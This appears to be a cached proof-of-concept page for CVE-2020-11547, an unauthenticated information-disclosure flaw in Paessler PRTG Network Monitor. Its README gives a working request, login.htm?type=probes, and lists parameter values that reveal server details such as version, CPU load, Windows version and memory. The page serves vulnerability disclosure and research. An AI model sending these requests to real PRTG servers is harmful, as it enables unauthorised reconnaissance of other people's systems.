CVE-2020-11547 PoC — Paessler PRTG Network Monitor 信息泄露漏洞

Source

https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure

Associated Vulnerability

Title:Paessler PRTG Network Monitor 信息泄露漏洞 (CVE-2020-11547)
Description:Paessler PRTG Network Monitor是德国Paessler公司的一款全功能网络监控管理软件。 Paessler PRTG Network Monitor 20.1.57.1745之前版本中存在安全漏洞。远程攻击者可借助HTTP请求利用该漏洞获取有关正在运行的探针或服务器本身的信息（CPU使用率，内存，Windows版本和内部统计信息）。

Readme

# PRTG-Network-Monitor-Information-Disclosure - CVE-2020-11547

Remote unauthenticated user can craft an HTTP request in /public/login.htm or /index.htm by providing the 'type' parameter.

Example: http://127.0.0.1/public/login.htm?type=probes

replace probes by any of the following to get diferent info

- version
- cpuload
- dnsname
- serverhttpurl
- windowsversion
- systemid
- treestat
- memory
- requests
- screenshot
- lastsync
- probes
- warnings

File Snapshot


 [4.0K]  /data/pocs/2fc1e81860369b1a29f028deb50b996de2bd8128
└── [ 455]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!